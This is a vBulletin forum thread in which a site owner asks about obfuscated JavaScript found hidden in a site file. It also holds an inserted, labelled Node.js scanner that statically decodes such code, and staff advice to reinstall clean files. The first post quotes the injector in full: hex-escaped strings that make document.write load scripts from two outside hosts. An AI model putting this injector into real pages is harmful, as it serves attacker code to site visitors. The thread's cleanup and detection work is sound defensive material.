Okay to remove file var _0xe62f from java.cs?


  • [Forum] Okay to remove file var _0xe62f from java.cs?

    On another thread the file var _0xe62f was quoted as a potential culprit in web attacks. In my .cs file for java, I found this same file at the very bottom on Line 558 as if it were placed there to be hidden. I copied and removed it, and the site seems to be working okay. Here is the code:
    PHP Code:
    var _0xe62f=["\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6F\x65\x69\x31\x2E\x67\x71\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6D\x66\x69\x6F\x2E\x63\x66\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"];document[_0xe62f[1]](_0xe62f[0]);document[_0xe62f[1]](_0xe62f[2]) 

    DAVID COPELAND
    Licensed VB Holder Since 2000
    Celebrating 20 Years with VB
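As an added example (not part of the original posts and not vBulletin code): a Node.js scanner that statically decodes a hex-escaped string array of the kind quoted in the first post and reports which script hosts it would write into the page, without executing anything. The function names and the sample, which points at the reserved placeholder host example.invalid, are constructed for illustration.

```javascript
// Statically decode an obfuscated "_0x..." string array and report what it
// would inject. Nothing from the scanned source is executed (no eval).

// Constructed sample: same shape as the snippet in the post, but pointing at a
// reserved placeholder host instead of the hosts encoded on the page.
const hex = (s) =>
  [...s].map((c) => "\\x" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
const SAMPLE =
  "function legit(){return 1;}\n" +
  'var _0xabcd=["' + hex('<script type="text/javascript" src="//example.invalid"></script>') +
  '","' + hex("write") + '"];document[_0xabcd[1]](_0xabcd[0]);';

// Turn \xNN and \uNNNN escapes into characters.
function decodeEscapes(literal) {
  return literal
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function scanSource(source) {
  const findings = [];
  // Matches: var _0x1234=["...","..."]  (assumes no raw "]" inside the array,
  // which holds when every string is hex-escaped as in the quoted snippet).
  const arrayRe = /var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\]/gi;
  let m;
  while ((m = arrayRe.exec(source)) !== null) {
    const name = m[1];
    const strings = [...m[2].matchAll(/"((?:[^"\\]|\\.)*)"/g)].map((s) => decodeEscapes(s[1]));
    const line = source.slice(0, m.index).split("\n").length; // 1-based line of the array
    const hosts = [];
    for (const s of strings) {
      const tagRe = /<script[^>]*\ssrc\s*=\s*["']?(?:https?:)?\/\/([^"'\s\/>]+)/gi;
      for (const t of s.matchAll(tagRe)) hosts.push(t[1]);
    }
    // document[_0x..[n]] is a computed member access; decode which method it names.
    const callRe = new RegExp("document\\[" + name + "\\[(\\d+)\\]\\]", "g");
    const methods = [...new Set([...source.matchAll(callRe)].map((c) => strings[Number(c[1])]))];
    findings.push({ name, line, strings, hosts, methods });
  }
  return findings;
}

for (const f of scanSource(SAMPLE)) {
  console.log(`line ${f.line}: ${f.name} calls document.${f.methods.join(",")} to load ${f.hosts.join(", ")}`);
}
```

To check real files, read each `.js` file's contents into a string and pass it to `scanSource`; any finding with a non-empty `hosts` list is a script include that was hidden from a plain text search.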

  • #2
    vBulletin doesn't use Java. It does use Javascript. These are two completely different languages without relationship to each other despite the poor choice of names.

    vBulletin does not have any files with the .cs extension. If you don't know what this file does, then you should delete it. You shouldn't allow files on your server that you don't know what they do.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API



    • #3
      Originally posted by Wayne Luke
      vBulletin doesn't use Java. It does use Javascript. These are two completely different languages without relationship to each other despite the poor choice of names.

      vBulletin does not have any files with the .cs extension. If you don't know what this file does, then you should delete it. You shouldn't allow files on your server that you don't know what they do.

      To better determine what the code was related to, I did a Google search and the first hit was:

      https://www.vbulletin.com/forum/foru...-patch-level-4

      Another site that offers various VB support also had the same code listed on one of their threads. The actual code may not be a VB file, but it appears there may be backdoor shells in place.

      After spending 4 hours going through server and cPanel files, I was able to stop the intrusiveness. Our server access is turned off to anyone who is not using our dedicated IP address. But I will be looking for some more tips (backdoor preventives) to help make this nightmare see a glimmer of hope.


      DAVID COPELAND
      Licensed VB Holder Since 2000
      Celebrating 20 Years with VB



      • #4
        If you're not currently using vBulletin 4.2.5 with a fresh set of files then you'll have problems. Patches do not remove exploits from your site. If you patched to 4.2.2 PL4 back in 2013, or so, and didn't remove any backdoor exploit, it would have remained until today. You have to remove these manually. We have an entire topic on this stickied in this forum.

        https://www.vbulletin.com/forum/foru...ring-your-site

        Here is what I would do...

        1) Log into the AdminCP and disable all third-party products.
        2) Rename my vBulletin directory to something else.
        3) Create a new directory to hold vBulletin.
        4) Upload new files from a fresh download of vBulletin 4.2.5.
        5) Use these files to run your forum.

        Other options would be upgrading to vBulletin 5.5.0 or vBulletin Cloud.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API
